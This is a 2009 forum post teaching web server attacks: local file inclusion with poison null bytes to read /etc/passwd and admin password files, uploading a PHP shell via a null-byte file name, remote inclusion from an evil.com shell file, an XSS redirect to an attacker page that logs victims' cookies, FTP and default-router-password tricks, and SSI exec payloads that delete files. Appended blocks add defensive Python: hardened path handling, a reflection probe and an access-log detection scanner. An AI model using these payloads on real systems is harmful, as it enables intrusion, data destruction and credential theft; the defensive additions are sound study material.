Subject: Server Flaws (RFI,LFI,XSS,CSS) - Sat Jun 13, 2009 1:59 pm
Hello, many people go around the net nowadays making up these facts that they are great hackers and that they have a "Cracker/Hacker" tool. That is just a fantasy made up to scare you and get your interest; they think it will make you bribe them with anything.
Don't trust that, even if it's your best friend.
Today I will be showing you many, many flaws on an internal server; we will go through PHP attacks, Java attacks, and URL manipulation.
Let's start with URL manipulation, shall we?
Well, let's say you find a login for a certain website.
Go ahead and view the source.
If you see anything familiar to:
Then that is the PHP file representing login.php. Here is an example of what the URL may look like:
Once we go there, it will probably forbid access because we did not enter anything and we do not have any session ID given by the server.
But don't you see anything suspicious on the page that is functioning (index.php?file=login.php)? Well, if you see anything cached on that page, such as password.php, you're in luck. Go to that exact PHP file. You can do this via: http://www.target.com/admin/index.php?file=password.php
And you might get back the administrator username and password, with no encryption in any format whatsoever (MD5, SHA1, etc.).
But the administrators can go further to protect themselves; there are, however, more manipulations. Let's continue on to them.
Null Byte Includes
Now, in our last URL manipulation, we got access to the admin site, and while reviewing the source we found:
which showed us the password.php motive, telling us that if we replaced login.php with password.php it would show the administrative USR and PWD without any encryption (MD5, SHA1, etc.).
But what if the administrators have knowledge and are smarter? What they think is that LFI is LFI, and if its original form doesn't work, it will never work. But that is totally wrong. You can use null byte includes to gain knowledge of the PHP/CGI source that is representing that file.
So basically, let's say that password.php was forbidden for outside users. Here is a sample of that content:
It featured content showing the password without any encryption.
But once you go to it, you're forbidden; this can be changed by adding a null byte include. Here is how it would look:
That poisoned null byte gives us the ability to view the source of that .php file, thus giving us the password for the administrative user account.
This can be used for other destruction, such as viewing config.php, /etc/passwd, etc.
Null Byte Upload
Let's say you make an attempt to upload a shell to some website, but it replies with an error claiming it only accepts JPG, PNG, etc.
Well, most of you would say, "Ugh, I'll just give up."
And others would say, "I will just rename my shell to ShellName.php.jpg."
Both are wrong.
You can simply bypass this using a poison null byte upload.
How do you do this destructive attack? It's really simple; follow these steps:
1. Open Notepad
2. Copy and Paste your PHP Shell
3. File >> Save as >> shellname%00.php.jpg
4. Upload to the server
Our null byte (%00) adds a URL-encoded format into .jpg, thus giving back our file (in most cases your shell).
LFI stands for Local File Inclusion; it is basically a URL traversal. Here is an example of LFI code:
And here is an example of a vulnerable code:
<?php
// Vulnerable on purpose: the page name is taken straight from the query
// string and handed to include() without any validation.
$page = $_GET['page'];
include($page);
?>
That PHP script should never be used, because $page is passed directly to the webpage.
And the LFI code represents what can happen if your $page is written like that.
The ../'s you see are called URL traversal; they let you move anywhere around the server using characters that represent up, down, etc.
Let's move on to the LFI script itself and play around with it for a bit.
What that does is go up to the directory /etc/passwd.
/etc/passwd is a representation of a Linux box featuring its encrypted passwords; just like Windows has its own encrypted password function (SAM), Unix has it as well.
Once they gain access to that directory, they have the ability to view users and crack the encoded passwords via brute force.
But sometimes administrators can be smart, and this is where the poisoned null byte comes in handy: if you cannot access /etc/passwd, it eventually means that the administrator appended something to it.
So you can try:
You can use a poison null byte due to the fact that sometimes admins try to add something like .php or .txt, etc., to make it harder for you to gain access to the file.
Fortunately, you can easily bypass this using the poison null byte.
RFI is most commonly used to transmit a shell to a web server, but it's actually not uploaded; it is just an appearance on the web server itself.
RFI can be used for plenty of things, transmitting password loggers, etc., but it's commonly used for its brilliant ability to store a shell.
Now, if you're not familiar with what a shell is, a shell is a PHP script that is used to cd to directories, view dirs, gain access to MySQL, and find private files the server has stored on its web server.
How can this be a bad thing for you? They can leak an entire DB using their access to MySQL; this DB can feature usernames, passwords, emails, etc.
They can gain access to ANYTHING. Here is an example of an RFI attempt:
That tells the web server to go to the page http://www.evil.com/shell.txt
And how will it work, you may be asking yourself? Well, it will work because the .txt file is filled with PHP commands/tags that point at the PHP extension.
We need to add the ? due to the fact that it's basically like a URL traversal thing, but it's really not; it just points at that directory (http://www.evil.com/shell.txt).
XSS is used a lot on search engines; it can also be used to point at an XSShell.
That makes an alert box featuring our keyword "Test".
So press enter, and if it comes back with what we presented in our script, then your site is vulnerable to XSS.
If you get the (sup) back, it is also vulnerable to HTML injection.
<meta http-equiv="refresh" content="0;url=http://www.yourxsshell.com/attack.php" />
That uses meta to redirect to your XSShell.
Here is an example of how that may look after it's encoded (this uses google.com as an example):
There you go; it is encoded.
What you want to do is redirect it to your XSShell, so you might need to modify my example.
Download xsshell (includes info etc)
Now, once you send that XSS'd link to somebody, which includes your XSShell, you will log all of their cookies, session IDs, etc.
You can even put a Trojan download instead of an XSShell, but you have to make it look well thought out.
FTP is the File Transfer Protocol on a web server; it is used to store files, view files, etc.
But there is a root account that contains all the permissions; we don't have root, and it would probably take forever to brute-force the account.
So a trick is to do the following:
1. Open Command Prompt
2. Type in: ftp http://www.target.com
3. Enter WRONG details.
4. Then once you're done with that, type in: quote user ftp
   then type in: quote cwd ~root
   then type in: quote pass ftp
That quotes the user account FTP.
Then it quotes the cwd of ~root.
Don't expect this to work on every website; some websites have anonymous login disabled, meaning this won't work as much as you expected it to.
Robots.txt is a text file that is used to control spiders that visit your website. This file grants access to certain folders, file types, and specific files depending on the robot accessing the site.
Here is an example of robots.txt:
Also, the User-agent: *
This can be used as a URL traversal method.
Here is an example of what it may look like:
Well, after you get a 404 error page, you should see something like /../
You may notice from our LFI explanation that /../ is used to move to other directories; well, in this case it gives us access to the disallowed directories that are listed in robots.txt. For example:
But do NOT expect this to work on every single website that has robots.txt
A method of transmitting PPP traffic over Ethernet to the Internet through a common broadband medium.
But sometimes even hosts do not have PPP tunneled (if they have it on their network).
PPP can be used in telnet, so that is what we will be focusing on.
First, you want to do an nmap scan via:
nmap -v -A host.com
And you will need to wait until it is finished; we will need to see what OS this runs under. This will give us loads of information, such as possible router info.
So after it's done, you might want to go to Google and search:
Router-Name Default Password
Because in telnet, the PPPoE password is usually the default.
So, for example, if it prompts you for the user and password, you can try:
Now, once you're in, you can cd to directories and view dirs; the /var section includes the ability to view messages, logs, etc.
You may want to focus on finding config.xml, because that includes CWMP, ACS, and possible POP information.
If, however, you cannot get PPPoE access, you can run a brute-force attack, or you can try accessing certain directories such as cwmp.host.com. Usually the sites are put under HTTPS because they think it's a high level of encryption, so it's harder to crack, but the password for that can be easily obtained by using user-agent vulnerabilities, cookie spoofing, and also FTP vulnerabilities, which were discussed in our previous tutorial on Web Hacking.
The FTP vulnerabilities we discussed will get you to a very high level because it may include DBs, configs, etc.
Serverside Includes (Evil SSI)
The most common way to find one of these vulnerabilities is to simply use a search box. Server-side includes are basically abilities to view directories. Just so I can explain it in a more efficient way, let's say you're in the directory /admin, and you have a search field, and you're wondering what else is in the /admin directory; well, you can simply use this:
ls is a command used to display directories, and cmd is basically a command prompt.
After we get a reply displayed along with directories, we can use rm to remove directories, for example:
<!--#exec cmd="rm file.php"-->
We can do a lot of things, but these are just set examples.
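The following is an added example, not code from the original post: it models the include-path and upload-name handling the post's LFI, traversal and poison-null-byte sections rely on, side by side with a hardened version. The `legacy_truncate` helper stands in for the C-string behaviour of old PHP (before 5.3.4), where a path such as `../../etc/passwd%00.php` was cut at the NUL so the appended `.php` disappeared; current PHP rejects paths containing NUL bytes, which is what the hardened resolver does too. The directory layout, file contents and function names are constructed for the demo.

```python
"""Vulnerable vs. hardened include resolution and upload-name checks.

Added example; not from the original post. The web root, the files in it and
the sample /etc/passwd line are constructed for the demo.
"""
import os
import shutil
import tempfile
from urllib.parse import unquote

INCLUDE_EXT = ".php"
ALLOWED_UPLOAD_EXTS = {".jpg", ".jpeg", ".png", ".gif"}


def legacy_truncate(path: str) -> str:
    """Model a C-string consumer (old PHP): everything after the first NUL is dropped."""
    return path.split("\x00", 1)[0]


def vulnerable_resolve(base_dir: str, page: str) -> str:
    """index.php?file=<page> done the naive way: concatenate, append .php.
    Returns the path a legacy C-string open() would actually see."""
    raw = os.path.join(base_dir, unquote(page) + INCLUDE_EXT)
    return legacy_truncate(raw)


def hardened_resolve(base_dir: str, page: str):
    """Accept only a bare file name that resolves inside base_dir.
    Returns the resolved path, or None when the request is rejected."""
    page = unquote(page)
    if "\x00" in page or "/" in page or "\\" in page or ".." in page:
        return None
    candidate = os.path.realpath(os.path.join(base_dir, page + INCLUDE_EXT))
    root = os.path.realpath(base_dir) + os.sep
    if not candidate.startswith(root):
        return None
    return candidate if os.path.isfile(candidate) else None


def vulnerable_upload_ok(filename: str) -> bool:
    """Extension check on the decoded name: 'shell.php%00.jpg' ends in .jpg,
    so it passes, yet a C-string open() would write 'shell.php'."""
    return os.path.splitext(unquote(filename))[1].lower() in ALLOWED_UPLOAD_EXTS


def hardened_upload_ok(filename: str) -> bool:
    """Reject NUL and any path component, then check the final extension.
    A double extension like 'x.php.jpg' is still '.jpg' here, so the upload
    directory must additionally be served with script execution disabled."""
    name = unquote(filename)
    if "\x00" in name or name != os.path.basename(name):
        return False
    return os.path.splitext(name)[1].lower() in ALLOWED_UPLOAD_EXTS


def demo():
    """Build a constructed web root and run both resolvers on the post's payloads.
    Returns {page: (path the vulnerable resolver opens, hardened resolver accepts?)}."""
    root = tempfile.mkdtemp()
    try:
        www = os.path.join(root, "www")
        os.makedirs(www)
        for name in ("login.php", "password.php"):
            with open(os.path.join(www, name), "w") as f:
                f.write(f"<?php // {name} (constructed) ?>")
        etc = os.path.join(root, "etc")
        os.makedirs(etc)
        with open(os.path.join(etc, "passwd"), "w") as f:
            f.write("root:x:0:0:root:/root:/bin/sh\n")  # constructed sample line

        results = {}
        for page in ("login", "password", "../etc/passwd", "../etc/passwd%00"):
            results[page] = (
                os.path.relpath(vulnerable_resolve(www, page), root),
                hardened_resolve(www, page) is not None,
            )
        return results
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for page, (opened, accepted) in demo().items():
        print(f"{page!r:24} legacy opens {opened!r:20} hardened accepts: {accepted}")
    for name in ("photo.jpg", "shell.php.jpg", "shell.php%00.jpg", "../photo.jpg"):
        print(f"{name!r:22} naive: {vulnerable_upload_ok(name)}  hardened: {hardened_upload_ok(name)}")
```

The point of the `realpath` prefix check is that it does not matter how the traversal is spelled (`../`, `..\`, encoded variants): the path is normalised first and then compared against the web root. Note also that `shell.php.jpg` passes both upload checks, which is why the post's remark that renaming "is wrong" is only half the story: the real control is that nothing under the upload directory is ever executed.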
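Added example, not part of the original post: the search-box reflection test the post describes for XSS and HTML injection, and the same test for the SSI `<!--#exec ...-->` directive from the "Evil SSI" section. Two constructed page templates are used: `render_vulnerable` pastes the query straight into the HTML, `render_hardened` HTML-escapes it. `probe` sends one payload of each kind containing a canary string and reports which ones come back with their markup intact. The templates, canary and function names are assumptions for the demo.

```python
"""Reflection probe for XSS, HTML injection and SSI directives.

Added example; not from the original post. Templates and payloads are constructed.
"""
import html

CANARY = "xyz123canary"  # constructed marker so a hit can be told from the original page

PAYLOADS = {
    "xss":  f"<script>alert('{CANARY}')</script>",   # the post's alert test
    "html": f"<sup>{CANARY}</sup>",                   # the post's (sup) test
    "ssi":  f'<!--#exec cmd="echo {CANARY}"-->',      # the post's Evil SSI directive
}

TEMPLATE = "<html><body><h1>Search results for: {q}</h1><p>0 hits</p></body></html>"


def render_vulnerable(q: str) -> str:
    """Echo the query into the page unescaped, as the post's targets do."""
    return TEMPLATE.format(q=q)


def render_hardened(q: str) -> str:
    """Escape <, >, &, quotes before the query touches the HTML."""
    return TEMPLATE.format(q=html.escape(q, quote=True))


def reflects_raw(page: str, payload: str) -> bool:
    """True when the payload appears verbatim, i.e. its markup survived."""
    return payload in page


def probe(render) -> dict:
    """Map each payload kind to whether the renderer reflects it unescaped."""
    return {kind: reflects_raw(render(p), p) for kind, p in PAYLOADS.items()}


def classify(findings: dict) -> list:
    """Turn probe results into the labels the post uses."""
    labels = []
    if findings["xss"]:
        labels.append("XSS")
    if findings["html"]:
        labels.append("HTML injection")
    if findings["ssi"]:
        # Reflection alone is not execution: the directive only runs if the
        # server actually parses SSI for this response.
        labels.append("SSI directive reflected")
    return labels


if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        f = probe(render)
        print(name, f, classify(f))
```

A hardened page still shows the query text (the canary is present in the escaped output), so the search keeps working; only the angle brackets lose their meaning. For SSI the probe only proves reflection; whether `exec` runs depends on the server's `Options +Includes` configuration, which is also the fix when escaping is not possible.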
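Added example, not from the original post: a small robots.txt parser that lists the paths each user-agent group is told to stay out of, which is the recon use the post describes. The post's own robots.txt example did not survive, so the sample below is constructed, as are the function names.

```python
"""robots.txt parser for reconnaissance.

Added example; not from the original post. SAMPLE_ROBOTS is constructed.
"""

SAMPLE_ROBOTS = """\
# constructed sample robots.txt
User-agent: *
Disallow: /admin/
Disallow: /backup/
Allow: /public/

User-agent: Googlebot
User-agent: Bingbot
Disallow: /private-search/
Disallow:
Sitemap: http://www.example.com/sitemap.xml
"""


def parse_robots(text: str):
    """Return ({agent: {"disallow": [...], "allow": [...]}}, [sitemaps]).

    Handles several User-agent lines sharing one rule block, '#' comments,
    case-insensitive field names and an empty Disallow (which means 'allow all').
    """
    groups, sitemaps = {}, []
    current = []            # agents the following rules apply to
    rules_seen = False      # True once a rule line followed the current agents
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or ":" not in line:
            continue
        field, _, value = line.partition(":")
        field, value = field.strip().lower(), value.strip()
        if field == "user-agent":
            if rules_seen:          # a new block starts after the previous rules
                current, rules_seen = [], False
            current.append(value)
            groups.setdefault(value, {"disallow": [], "allow": []})
        elif field in ("disallow", "allow"):
            rules_seen = True
            if value:
                for agent in current:
                    groups[agent][field].append(value)
        elif field == "sitemap":
            sitemaps.append(value)
    return groups, sitemaps


def hidden_paths(text: str) -> list:
    """All Disallow paths across every group, deduplicated, in file order:
    the list a tester would request by hand next."""
    groups, _ = parse_robots(text)
    seen, out = set(), []
    for rules in groups.values():
        for p in rules["disallow"]:
            if p not in seen:
                seen.add(p)
                out.append(p)
    return out


if __name__ == "__main__":
    groups, sitemaps = parse_robots(SAMPLE_ROBOTS)
    for agent, rules in groups.items():
        print(agent, rules)
    print("sitemaps:", sitemaps)
    print("paths worth a look:", hidden_paths(SAMPLE_ROBOTS))
```

robots.txt is a request to crawlers, not an access control, so a listed directory is worth a direct request; conversely the `/../` trick the post mentions cannot turn a server-side 403 into a 200, it only changes which path the server resolves.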
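Added example, not from the original post: the defender's side of the same material, a scanner run over constructed Apache combined-format access-log lines that flags the request patterns the post walks through (directory traversal, poison null byte, remote-URL include, reflected script tag, SSI exec directive). The log lines, rule names and functions are assumptions for the demo.

```python
"""Access-log scanner for the request patterns described in the post.

Added example; not from the original post. SAMPLE_LOG and RULES are constructed.
"""
import re
from urllib.parse import unquote

SAMPLE_LOG = """\
203.0.113.5 - - [13/Jun/2009:13:59:01 +0000] "GET /admin/index.php?file=login.php HTTP/1.1" 200 1432
203.0.113.5 - - [13/Jun/2009:13:59:07 +0000] "GET /admin/index.php?file=../../../../etc/passwd%00 HTTP/1.1" 200 2211
203.0.113.5 - - [13/Jun/2009:13:59:15 +0000] "GET /index.php?page=http://www.evil.com/shell.txt? HTTP/1.1" 200 512
203.0.113.5 - - [13/Jun/2009:13:59:22 +0000] "GET /search.php?q=%3Cscript%3Ealert(%22Test%22)%3C/script%3E HTTP/1.1" 200 900
203.0.113.5 - - [13/Jun/2009:13:59:30 +0000] "GET /search.php?q=%3C!--%23exec%20cmd%3D%22ls%22--%3E HTTP/1.1" 200 880
198.51.100.7 - - [13/Jun/2009:14:01:00 +0000] "GET /images/logo.png HTTP/1.1" 200 4100
"""

# Apache combined log prefix: ip ident user [time] "method path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

RULES = [
    ("traversal", re.compile(r"\.\.[/\\]")),                          # ../ or ..\
    ("null_byte", re.compile(r"\x00")),                               # decoded %00
    ("rfi",       re.compile(r"[?&][^=&]*=(?:https?|ftp)://", re.I)), # param=http://...
    ("xss",       re.compile(r"<\s*script", re.I)),                   # <script
    ("ssi_exec",  re.compile(r"<!--\s*#\s*(exec|include)\b", re.I)),  # <!--#exec
]


def normalise(path: str) -> str:
    """Decode twice so double-encoded payloads (%2500, %252e) are caught too."""
    return unquote(unquote(path))


def scan_line(line: str):
    """Return (ip, raw path, [matched rule names]) or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = normalise(m.group("path"))
    hits = [name for name, rx in RULES if rx.search(decoded)]
    return m.group("ip"), m.group("path"), hits


def scan_log(text: str) -> list:
    """Every parsed line that matched at least one rule, in log order."""
    findings = []
    for line in text.splitlines():
        r = scan_line(line)
        if r and r[2]:
            findings.append(r)
    return findings


def offenders(text: str) -> dict:
    """Flagged-request count per source IP, for triage."""
    counts = {}
    for ip, _, _ in scan_log(text):
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    for ip, path, hits in scan_log(SAMPLE_LOG):
        print(ip, hits, path)
    print(offenders(SAMPLE_LOG))
```

Matching on the decoded path rather than the raw one is what makes the `%3Cscript%3E` and `%23exec` lines visible; a rule written against the raw string would miss them. The status code is parsed but deliberately not used as a filter, since a 200 on the `%00` line is exactly the case worth seeing.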
Subject: Re: Server Flaws (RFI,LFI,XSS,CSS) - Sat Dec 26, 2009 1:53 pm
What do you mean by "a lot of things"?